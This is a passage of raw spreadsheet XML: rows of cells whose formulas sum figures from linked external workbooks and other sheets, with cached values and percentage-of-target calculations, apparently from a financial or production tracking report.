      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1362281.73</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]1'!$L$16</f>
        <v>61803.77</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>82.4050266666667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'[11]1'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]1'!$E$13</f>
        <v>1748</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'r'!H32</f>
        <v>1748</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1529591</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]1'!$I$13</f>
        <v>1990</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'r'!K32</f>
        <v>1990</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1023468</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]1'!$L$13</f>
        <v>59528.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>119.057232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209" t="e">
        <f>'[13]1'!$W$76</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S32" s="209" t="e">
        <f>'[13]1'!$X$76</f>
        <v>#DIV/0!</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]1'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]1'!$T$76</f>
        <v>0</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]1'!$U$76</f>
        <v>0</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]1'!$V$76</f>
        <v>4.1044776119403e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]1'!$Q$76</f>
        <v>0</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]1'!$R$76</f>
        <v>0</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]1'!$S$76</f>
        <v>3.3e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]1'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'r'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]1'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'r'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]1'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]1'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]1'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]1'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]1'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]1'!$U$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]1'!$V$77</f>
        <v>62.9330845771159</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]1'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]1'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]1'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]1'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'r'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]1'!$I$50</f>
        <v>666.89</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'r'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]1'!$L$15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'[11]1'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'r'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]1'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'r'!K35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G36+'r'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'r'!K36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G37+'r'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'r'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]1'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]1'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]1'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'r'!U38</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]1'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'r'!X38</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]1'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'r'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'r'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]1'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]1'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]1'!$R$10</f>
        <v>769.18</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'r'!U39</f>
        <v>769.18</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>259908.9</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]1'!$V$10</f>
        <v>821</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'r'!X39</f>
        <v>821</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>256928</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]1'!$Y$10</f>
        <v>9593.511</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'r'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'r'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]1'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]1'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]1'!$R$50</f>
        <v>363.32</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'r'!U40</f>
        <v>363.32</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>79176.919</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]1'!$V$50</f>
        <v>241</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'r'!X40</f>
        <v>241</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>79000</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]1'!$Y$50</f>
        <v>1353.866</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'r'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'r'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]1'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]1'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]1'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]1'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]1'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]1'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]1'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]1'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]1'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]1'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]1'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'r'!H51</f>
        <v>0</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>124976</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]1'!$I$16</f>
        <v>419.5</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'r'!K51</f>
        <v>419.5</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>121813.04</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]1'!$L$16</f>
        <v>25710.26</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>85.7008666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]1'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]1'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]1'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'r'!U42</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]1'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'r'!X42</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]1'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]1'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]1'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'r'!H52</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]1'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'r'!K52</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]1'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]1'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]1'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]1'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'r'!U43</f>
        <v>0</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>207586.97</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]1'!$V$8</f>
        <v>221</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'r'!X43</f>
        <v>221</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>202692</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]1'!$Y$8</f>
        <v>8257.836</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]1'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]1'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'r'!H53</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]1'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'r'!K53</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]1'!$L$14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'[12]1'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'r'!H54</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]1'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'r'!K54</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]1'!$L$15</f>
        <v>67564.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]1'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]1'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]1'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'r'!U45</f>
        <v>0</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>64753.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]1'!$V$29</f>
        <v>102</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'r'!X45</f>
        <v>102</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>66512</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]1'!$Y$29</f>
        <v>2197.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]1'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'r'!H55</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]1'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'r'!K55</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]1'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]1'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]1'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]1'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]1'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]1'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]1'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]1'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]1'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'r'!H56</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'r'!K56</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]1'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]1'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]1'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'r'!U51</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]1'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'r'!X51</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]1'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'r'!H57</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'r'!K57</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]1'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]1'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]1'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'r'!U52</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]1'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'r'!X52</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]1'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'r'!H58</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'r'!K58</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]1'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]1'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]1'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'r'!U53</f>
        <v>0</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6026.53</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]1'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'r'!X53</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]1'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'r'!H59</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'r'!K59</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]1'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]1'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]1'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'r'!U54</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]1'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'r'!X54</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]1'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'r'!H60</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'r'!K60</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]1'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]1'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]1'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'r'!U55</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]1'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'r'!X55</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]1'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
